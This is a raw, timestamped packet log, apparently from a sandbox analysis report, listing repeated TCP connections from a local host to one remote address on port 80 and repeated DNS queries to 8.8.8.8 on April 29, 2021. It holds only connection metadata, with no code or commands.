                                          Apr 29, 2021 08:24:16.388081074 CEST4954480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:16.622680902 CEST4954480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:16.625216007 CEST4954580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:16.710576057 CEST804954495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:16.710688114 CEST4954480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:16.712980986 CEST804954595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:16.713121891 CEST4954580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:16.714250088 CEST4954580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:16.802218914 CEST804954595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:16.836950064 CEST804954595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:16.837045908 CEST4954580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:17.051827908 CEST4954580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:17.053148985 CEST4954680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:17.140285969 CEST804954595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:17.140450954 CEST4954580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:17.141295910 CEST804954695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:17.141381025 CEST4954680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:17.142498016 CEST4954680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:17.230983973 CEST804954695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:17.265283108 CEST804954695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:17.265475035 CEST4954680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:17.496294022 CEST4954680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:17.498879910 CEST4954780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:17.585875988 CEST804954695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:17.585971117 CEST4954680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:17.587925911 CEST804954795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:17.588128090 CEST4954780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:17.593389034 CEST4954780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:17.681603909 CEST804954795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:17.715223074 CEST804954795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:17.715440989 CEST4954780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:17.946921110 CEST4954780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:17.949178934 CEST4954880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:18.035415888 CEST804954795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:18.035499096 CEST4954780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:18.039109945 CEST804954895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:18.039247036 CEST4954880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:18.040235043 CEST4954880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:18.130625963 CEST804954895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:18.166444063 CEST804954895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:18.166660070 CEST4954880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:18.401843071 CEST4954880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:18.404356956 CEST4954980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:18.491992950 CEST804954895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:18.492125034 CEST4954880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:18.510698080 CEST804954995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:18.510823965 CEST4954980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:18.512223959 CEST4954980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:18.617957115 CEST804954995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:18.652337074 CEST804954995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:18.652580976 CEST4954980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:18.882584095 CEST4954980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:18.883995056 CEST4955080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:18.975004911 CEST804955095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:18.975116014 CEST4955080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:18.975775957 CEST4955080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:18.988631964 CEST804954995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:18.988713980 CEST4954980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:19.065932035 CEST804955095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:19.099287987 CEST804955095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:19.100018978 CEST4955080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:19.317028999 CEST4955080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:19.318589926 CEST4955180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:19.407119036 CEST804955095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:19.407375097 CEST4955080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:19.412797928 CEST804955195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:19.413031101 CEST4955180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:19.414419889 CEST4955180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:19.509464025 CEST804955195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:19.543034077 CEST804955195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:19.543231010 CEST4955180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:19.771660089 CEST4955180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:19.774192095 CEST4955280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:19.864649057 CEST804955295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:19.864819050 CEST4955280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:19.866071939 CEST4955280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:19.866564035 CEST804955195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:19.866692066 CEST4955180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:19.957133055 CEST804955295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:19.991341114 CEST804955295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:19.991481066 CEST4955280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:20.224029064 CEST4955280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:20.226422071 CEST4955380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:20.314407110 CEST804955295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:20.314558029 CEST4955280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:20.320365906 CEST804955395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:20.320502996 CEST4955380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:20.322063923 CEST4955380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:20.416021109 CEST804955395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:20.449620962 CEST804955395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:20.449852943 CEST4955380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:20.680238008 CEST4955380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:20.682322979 CEST4955480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:20.771900892 CEST804955495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:20.772028923 CEST4955480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:20.772947073 CEST4955480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:20.774285078 CEST804955395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:20.774380922 CEST4955380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:20.862354994 CEST804955495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:20.895773888 CEST804955495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:20.896167994 CEST4955480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:21.140295029 CEST4955480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:21.141510010 CEST4955580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:21.230484962 CEST804955495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:21.230621099 CEST4955480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:21.232105017 CEST804955595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:21.232227087 CEST4955580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:21.232877970 CEST4955580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:21.323066950 CEST804955595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:21.356631994 CEST804955595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:21.356720924 CEST4955580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:21.577826977 CEST4955580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:21.579895973 CEST4955680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:21.668422937 CEST804955595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:21.668519974 CEST4955580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:21.673752069 CEST804955695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:21.674032927 CEST4955680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:21.675245047 CEST4955680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:21.769181013 CEST804955695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:21.807295084 CEST804955695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:21.807598114 CEST4955680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:22.031306028 CEST4955680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:22.032968998 CEST4955780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:22.121444941 CEST804955795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:22.121603966 CEST4955780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:22.122312069 CEST4955780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:22.125277996 CEST804955695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:22.125354052 CEST4955680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:22.210812092 CEST804955795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:22.244584084 CEST804955795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:22.244750977 CEST4955780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:22.470107079 CEST4955780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:22.471191883 CEST4955880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:22.558645010 CEST804955795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:22.558758020 CEST4955780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:22.559480906 CEST804955895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:22.559587002 CEST4955880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:22.560925961 CEST4955880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:22.649348974 CEST804955895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:22.684420109 CEST804955895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:22.684763908 CEST4955880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:22.909437895 CEST4955880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:22.911392927 CEST4955980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:22.997289896 CEST804955895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:22.997452021 CEST4955880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:23.005712032 CEST804955995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:23.005942106 CEST4955980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:23.007167101 CEST4955980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:24:23.101926088 CEST804955995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:23.135772943 CEST804955995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:24:23.135917902 CEST4955980192.168.2.2295.47.161.162

                                          UDP Packets

                                          Apr 29, 2021 08:16:47.302200079 CEST6186553192.168.2.228.8.8.8
                                          Apr 29, 2021 08:16:49.314940929 CEST6186553192.168.2.228.8.8.8
                                          Apr 29, 2021 08:16:50.331748009 CEST53618658.8.8.8192.168.2.22
                                          Apr 29, 2021 08:16:51.340188026 CEST53618658.8.8.8192.168.2.22
                                          Apr 29, 2021 08:16:52.352313042 CEST53618658.8.8.8192.168.2.22
                                          Apr 29, 2021 08:16:54.363843918 CEST53618658.8.8.8192.168.2.22
                                          Apr 29, 2021 08:16:55.077754021 CEST5517153192.168.2.228.8.8.8
                                          Apr 29, 2021 08:16:56.085882902 CEST5517153192.168.2.228.8.8.8
                                          Apr 29, 2021 08:16:57.099900961 CEST5517153192.168.2.228.8.8.8
                                          Apr 29, 2021 08:16:59.112571001 CEST5517153192.168.2.228.8.8.8
                                          Apr 29, 2021 08:16:59.238643885 CEST53551718.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:00.207040071 CEST53551718.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:02.051995039 CEST5249653192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:02.152870893 CEST53551718.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:03.059897900 CEST5249653192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:04.073868990 CEST5249653192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:04.164755106 CEST53551718.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:06.086097002 CEST5249653192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:07.101130009 CEST53524968.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:08.109038115 CEST53524968.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:09.123047113 CEST53524968.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:09.408236980 CEST5756453192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:10.408071995 CEST5756453192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:11.160070896 CEST53524968.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:11.421968937 CEST5756453192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:13.434796095 CEST5756453192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:14.460660934 CEST53575648.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:15.460308075 CEST53575648.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:16.474087000 CEST53575648.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:17.270561934 CEST6300953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:18.270761013 CEST6300953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:18.486964941 CEST53575648.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:19.285089970 CEST6300953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:21.297862053 CEST6300953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:22.323371887 CEST53630098.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:23.323084116 CEST53630098.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:24.339030981 CEST53630098.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:24.627171993 CEST5931953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:25.635420084 CEST5931953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:26.349823952 CEST53630098.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:26.649065018 CEST5931953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:28.661513090 CEST5931953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:29.679543972 CEST53593198.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:29.713330030 CEST53593198.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:31.703680038 CEST53593198.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:32.499511003 CEST5307053192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:32.832165956 CEST53593198.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:33.513519049 CEST5307053192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:34.527468920 CEST5307053192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:36.540182114 CEST5307053192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:37.549154043 CEST53530708.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:38.563119888 CEST53530708.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:39.576813936 CEST53530708.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:39.866198063 CEST5977053192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:40.877504110 CEST5977053192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:41.589626074 CEST53530708.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:41.891549110 CEST5977053192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:43.904705048 CEST5977053192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:44.919480085 CEST53597708.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:44.951870918 CEST53597708.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:46.943453074 CEST53597708.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:47.749638081 CEST6152353192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:48.756294012 CEST6152353192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:48.959616899 CEST53597708.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:49.770554066 CEST6152353192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:51.782840967 CEST6152353192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:52.799541950 CEST53615238.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:53.805877924 CEST53615238.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:54.820394993 CEST53615238.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:55.098718882 CEST6279153192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:56.104554892 CEST6279153192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:56.831685066 CEST53615238.8.8.8192.168.2.22
                                          Apr 29, 2021 08:17:57.118822098 CEST6279153192.168.2.228.8.8.8
                                          Apr 29, 2021 08:17:59.130877972 CEST6279153192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:00.148974895 CEST53627918.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:00.213671923 CEST53627918.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:02.167762995 CEST53627918.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:02.951102972 CEST5066753192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:03.952163935 CEST5066753192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:04.180115938 CEST53627918.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:04.966222048 CEST5066753192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:06.978399038 CEST5066753192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:08.002758980 CEST53506678.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:09.003921032 CEST53506678.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:10.018265009 CEST53506678.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:10.310333014 CEST5412953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:11.315612078 CEST5412953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:12.031404972 CEST53506678.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:12.329812050 CEST5412953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:14.342727900 CEST5412953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:15.363049030 CEST53541298.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:16.364726067 CEST53541298.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:17.380562067 CEST53541298.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:18.157483101 CEST6532953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:19.163316011 CEST6532953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:19.392508984 CEST53541298.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:20.177546024 CEST6532953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:22.190094948 CEST6532953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:23.209110022 CEST53653298.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:24.215069056 CEST53653298.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:25.229593992 CEST53653298.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:25.516889095 CEST6071853192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:26.527303934 CEST6071853192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:27.242328882 CEST53653298.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:27.541420937 CEST6071853192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:29.553545952 CEST6071853192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:30.566313028 CEST53607188.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:31.576910973 CEST53607188.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:31.652856112 CEST53607188.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:33.377130032 CEST4915753192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:34.390263081 CEST4915753192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:34.603182077 CEST53607188.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:35.404262066 CEST4915753192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:37.417042017 CEST4915753192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:37.446479082 CEST53491578.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:38.471015930 CEST53491578.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:39.750850916 CEST5739153192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:40.453818083 CEST53491578.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:40.755887032 CEST5739153192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:41.773745060 CEST5739153192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:42.466054916 CEST53491578.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:43.782186031 CEST5739153192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:44.800219059 CEST53573918.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:45.805493116 CEST53573918.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:46.822938919 CEST53573918.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:47.607588053 CEST6185853192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:47.857362032 CEST53573918.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:48.618860960 CEST6185853192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:49.632738113 CEST6185853192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:51.645442009 CEST6185853192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:52.659811974 CEST53618588.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:53.677119970 CEST53618588.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:54.685225964 CEST53618588.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:54.960975885 CEST6250053192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:55.966974020 CEST6250053192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:56.696758986 CEST53618588.8.8.8192.168.2.22
                                          Apr 29, 2021 08:18:56.981061935 CEST6250053192.168.2.228.8.8.8
                                          Apr 29, 2021 08:18:58.993891954 CEST6250053192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:00.010415077 CEST53625008.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:01.016241074 CEST53625008.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:02.031656981 CEST53625008.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:02.816595078 CEST5165253192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:03.829915047 CEST5165253192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:04.045422077 CEST53625008.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:04.844069958 CEST5165253192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:06.856813908 CEST5165253192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:07.866920948 CEST53516528.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:08.880821943 CEST53516528.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:09.894929886 CEST53516528.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:10.181422949 CEST6276253192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:11.193661928 CEST6276253192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:11.906649113 CEST53516528.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:12.208159924 CEST6276253192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:14.220547915 CEST6276253192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:15.231134892 CEST53627628.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:16.244839907 CEST53627628.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:16.368014097 CEST53627628.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:18.022157907 CEST5690553192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:19.025893927 CEST5690553192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:19.270474911 CEST53627628.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:20.040262938 CEST5690553192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:22.052923918 CEST5690553192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:23.069952011 CEST53569058.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:24.075489998 CEST53569058.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:25.088628054 CEST53569058.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:25.372905970 CEST5460953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:26.374020100 CEST5460953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:27.101855040 CEST53569058.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:27.388202906 CEST5460953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:29.400366068 CEST5460953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:29.530395031 CEST53546098.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:31.423455000 CEST53546098.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:32.335165977 CEST5810153192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:32.437933922 CEST53546098.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:33.348094940 CEST5810153192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:34.362051010 CEST5810153192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:34.449493885 CEST53546098.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:36.374481916 CEST5810153192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:37.384196997 CEST53581018.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:38.397454977 CEST53581018.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:39.411489010 CEST53581018.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:39.690820932 CEST6432953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:40.695997953 CEST6432953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:41.424129009 CEST53581018.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:41.710190058 CEST6432953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:43.722770929 CEST6432953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:44.740514040 CEST53643298.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:45.745582104 CEST53643298.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:46.759238958 CEST53643298.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:47.622308016 CEST6488153192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:48.621468067 CEST6488153192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:48.772165060 CEST53643298.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:49.635816097 CEST6488153192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:51.648148060 CEST6488153192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:52.672000885 CEST53648818.8.8.8192.168.2.22
